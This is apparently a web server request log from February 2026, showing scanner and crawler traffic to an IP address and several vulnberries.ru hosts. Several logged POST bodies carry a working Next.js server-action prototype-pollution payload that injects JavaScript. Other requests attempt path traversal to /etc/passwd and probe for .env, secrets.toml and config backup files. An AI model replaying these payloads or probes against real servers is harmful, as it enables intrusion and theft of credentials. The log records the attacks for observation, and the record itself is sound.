{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 89734+true+1191814;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx106946237477
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_106946237477
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx106946237477
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:34776
Path: /api/route
URL: /api/route
Method: POST
[2026-02-21 05:45:11] === HTTP Request ===
===================
------WebKitFormBoundaryx823664374261--
------WebKitFormBoundaryx823664374261
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx823664374261
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 126217+true+6525780;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx823664374261
X-Nextjs-Html-Request-Id: ilovepoop_823664374261
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx823664374261
Connection: close
Content-Length: 518
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:34768
Path: /app
URL: /app
Method: POST
[2026-02-21 05:45:11] === HTTP Request ===
===================
------WebKitFormBoundaryx330657664978--
------WebKitFormBoundaryx330657664978
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx330657664978
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 79237+true+4173021;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx330657664978
X-Nextjs-Html-Request-Id: ilovepoop_330657664978
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx330657664978
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Content-Length: 517
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:34764
Path: /_next/server
URL: /_next/server
Method: POST
[2026-02-21 05:45:10] === HTTP Request ===
===================
------WebKitFormBoundaryx694661483886--
------WebKitFormBoundaryx694661483886
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx694661483886
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 168481+true+4123085;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx694661483886
X-Nextjs-Html-Request-Id: ilovepoop_694661483886
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx694661483886
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 518
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:34748
Path: /api
URL: /api
Method: POST
[2026-02-21 05:45:10] === HTTP Request ===
===================
------WebKitFormBoundaryx98710407793--
------WebKitFormBoundaryx98710407793
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx98710407793
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 148671+true+663952;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx98710407793
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx98710407793
X-Nextjs-Request-Id: poop1234
Next-Action: x
X-Nextjs-Html-Request-Id: ilovepoop_98710407793
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 513
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:36086
Path: /_next
URL: /_next
Method: POST
[2026-02-21 05:45:08] === HTTP Request ===
[2026-02-21 05:45:07] Main page accessed - IP: 31.59.129.233:36070
===================
------WebKitFormBoundaryx234247787937--
------WebKitFormBoundaryx234247787937
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx234247787937
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 27683+true+8461792;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx234247787937
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_234247787937
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx234247787937
X-Nextjs-Request-Id: poop1234
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:36070
Path: /
URL: /
Method: POST
[2026-02-21 05:45:07] === HTTP Request ===
[2026-02-21 05:45:07] Main page accessed - IP: 31.59.129.233:36060
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:36060
Path: /
URL: /
Method: GET
[2026-02-21 05:45:07] === HTTP Request ===
[2026-02-21 01:18:10] Main page accessed - IP: 178.249.209.187:38210
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.249.209.187:38210
Path: /
URL: /
Method: GET
[2026-02-21 01:18:10] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:41528
Path: /jars
URL: /jars
Method: GET
[2026-02-21 00:21:21] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 1.2.168.178
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41290
Path: /.env
URL: /.env
Method: GET
[2026-02-20 23:56:02] === HTTP Request ===
[2026-02-20 23:50:27] Main page accessed - IP: 205.210.31.77:61362
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: gitlab.anzan.tech
RemoteAddr: 205.210.31.77:61362
Path: /
URL: /
Method: GET
[2026-02-20 23:50:27] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50036
Path: /settings.py.bak
URL: /settings.py.bak
Method: GET
[2026-02-20 23:46:42] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 209.17.114.78
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39152
Path: /.env
URL: /.env
Method: GET
[2026-02-20 23:03:39] === HTTP Request ===
[2026-02-20 22:55:45] Main page accessed - IP: 205.210.31.199:50192
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.199:50192
Path: /
URL: /
Method: GET
[2026-02-20 22:55:45] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:28434
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-02-20 22:36:05] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.226:48954
Path: /config
URL: /config
Method: GET
[2026-02-20 22:04:44] === HTTP Request ===
[2026-02-20 20:15:19] Main page accessed - IP: 195.3.221.86:54586
===================
Connection: close
User-Agent: python-requests/2.31.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54586
Path: /
URL: /
Method: GET
[2026-02-20 20:15:19] === HTTP Request ===
[2026-02-20 18:58:59] Main page accessed - IP: 205.210.31.242:63820
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.242:63820
Path: /
URL: /
Method: GET
[2026-02-20 18:58:59] === HTTP Request ===
[2026-02-20 18:04:42] Main page accessed - IP: 205.210.31.88:62326
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: media.vulnberries.ru
RemoteAddr: 205.210.31.88:62326
Path: /
URL: /
Method: GET
[2026-02-20 18:04:42] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:44356
Path: /jars
URL: /jars
Method: GET
[2026-02-20 17:05:54] === HTTP Request ===
[2026-02-20 15:50:46] Main page accessed - IP: 147.185.132.192:62350
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 147.185.132.192:62350
Path: /
URL: /
Method: GET
[2026-02-20 15:50:46] === HTTP Request ===
[2026-02-20 14:40:28] Main page accessed - IP: 44.220.188.95:40282
===================
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/57.0.3002.91 Safari/537.32
Connection: keep-alive
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 44.220.188.95:40282
Path: /
URL: /
Method: GET
[2026-02-20 14:40:28] === HTTP Request ===
[2026-02-20 13:10:59] Main page accessed - IP: 137.184.190.246:55472
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 137.184.190.246:55472
Path: /
URL: /
Method: GET
[2026-02-20 13:10:59] === HTTP Request ===
[2026-02-20 12:17:07] Main page accessed - IP: 198.235.24.207:61194
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: warehouse.vulnberries.ru
RemoteAddr: 198.235.24.207:61194
Path: /
URL: /
Method: GET
[2026-02-20 12:17:07] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 64.112.126.83:50007
Path: /.streamlit/secrets.toml
URL: /.streamlit/secrets.toml
Method: GET
[2026-02-20 11:56:42] === HTTP Request ===
[2026-02-20 11:53:48] Cabinet page accessed - user_id: , IP: 172.30.0.12:46228
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-For: 74.7.242.63
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46228
Path: /cabinet
URL: /cabinet
Method: GET
[2026-02-20 11:53:48] === HTTP Request ===
[2026-02-20 11:53:47] Login page accessed - IP: 172.30.0.12:46228
===================
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.242.63
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
From: gptbot(at)openai.com
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46228
Path: /login
URL: /login
Method: GET
[2026-02-20 11:53:47] === HTTP Request ===
[2026-02-20 11:53:45] Logs page accessed - IP: 172.30.0.12:46228
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.242.63
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46228
Path: /logs
URL: /logs
Method: GET
[2026-02-20 11:53:45] === HTTP Request ===
[2026-02-20 11:53:44] Defects page accessed - IP: 172.30.0.12:46228
===================
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
X-Forwarded-For: 74.7.242.63
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46228
Path: /defects
URL: /defects
Method: GET
[2026-02-20 11:53:44] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
From: gptbot(at)openai.com
Accept: */*
X-Forwarded-For: 74.7.242.63
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46228
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-02-20 11:53:43] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.242.63
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46228
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-20 11:53:40] === HTTP Request ===
[2026-02-20 11:53:38] Salary page accessed - IP: 172.30.0.12:46228
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.242.63
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46228
Path: /salary
URL: /salary
Method: GET
[2026-02-20 11:53:38] === HTTP Request ===
===================
Via: 2.0 Caddy
X-Forwarded-For: 74.7.242.63
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46228
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-20 11:53:36] === HTTP Request ===
[2026-02-20 11:53:33] Goods page accessed - IP: 172.30.0.12:46228
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.242.63
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46228
Path: /goods
URL: /goods
Method: GET
[2026-02-20 11:53:33] === HTTP Request ===
[2026-02-20 11:53:31] Main page accessed - IP: 172.30.0.12:46228
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.242.63
Accept-Encoding: gzip, br, deflate
X-Forwarded-Proto: https
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46228
Path: /
URL: /
Method: GET
[2026-02-20 11:53:31] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
From: oai-searchbot(at)openai.com
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.175.136
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46228
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-20 11:53:28] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.92:48014
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-02-20 10:08:22] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.14:19031
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-02-20 09:50:15] === HTTP Request ===
[2026-02-20 09:50:03] Main page accessed - IP: 64.62.156.21:34807
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.21:34807
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-02-20 09:50:03] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.22:25987
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-20 09:49:42] === HTTP Request ===
[2026-02-20 09:48:57] Main page accessed - IP: 64.62.156.10:13570
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.10:13570
Path: /
URL: /
Method: GET
[2026-02-20 09:48:57] === HTTP Request ===
[2026-02-20 08:04:47] Main page accessed - IP: 147.185.132.48:65004
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru
RemoteAddr: 147.185.132.48:65004
Path: /
URL: /
Method: GET
[2026-02-20 08:04:47] === HTTP Request ===
[2026-02-20 08:02:58] Main page accessed - IP: 146.148.12.176:33336
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 146.148.12.176:33336
Path: /
URL: /
Method: GET
[2026-02-20 08:02:58] === HTTP Request ===
[2026-02-20 07:21:38] Main page accessed - IP: 205.210.31.233:58304
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: auth.vulnberries.ru
RemoteAddr: 205.210.31.233:58304
Path: /
URL: /
Method: GET
[2026-02-20 07:21:38] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50012
Path: /.cursor/rules
URL: /.cursor/rules
Method: GET
[2026-02-20 06:52:43] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50018
Path: /config.py
URL: /config.py
Method: GET
[2026-02-20 06:40:44] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.121:7224
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-02-20 06:00:26] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.121:7172
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-20 06:00:18] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 162.142.125.121:7158
Path: *
URL: *
Method: PRI
[2026-02-20 06:00:18] === HTTP Request ===
[2026-02-20 06:00:17] Main page accessed - IP: 162.142.125.121:7150
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.121:7150
Path: /
URL: /
Method: GET
[2026-02-20 06:00:17] === HTTP Request ===
[2026-02-20 04:37:32] Main page accessed - IP: 205.210.31.218:56482
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.218:56482
Path: /
URL: /
Method: GET
[2026-02-20 04:37:32] === HTTP Request ===
[2026-02-20 03:30:26] Main page accessed - IP: 209.38.70.156:42670
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 209.38.70.156:42670
Path: /
URL: /
Method: GET
[2026-02-20 03:30:26] === HTTP Request ===
===================
------WebKitFormBoundaryx799927100861--
------WebKitFormBoundaryx799927100861
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx799927100861
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 332615+true+2404964;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx799927100861
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx799927100861
Next-Action: x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_799927100861
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:41678
Path: /api/route
URL: /api/route
Method: POST
[2026-02-20 03:19:22] === HTTP Request ===
===================
------WebKitFormBoundaryx590412028851--
------WebKitFormBoundaryx590412028851
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx590412028851
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 309215+true+1909390;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx590412028851
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx590412028851
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_590412028851
Next-Action: x
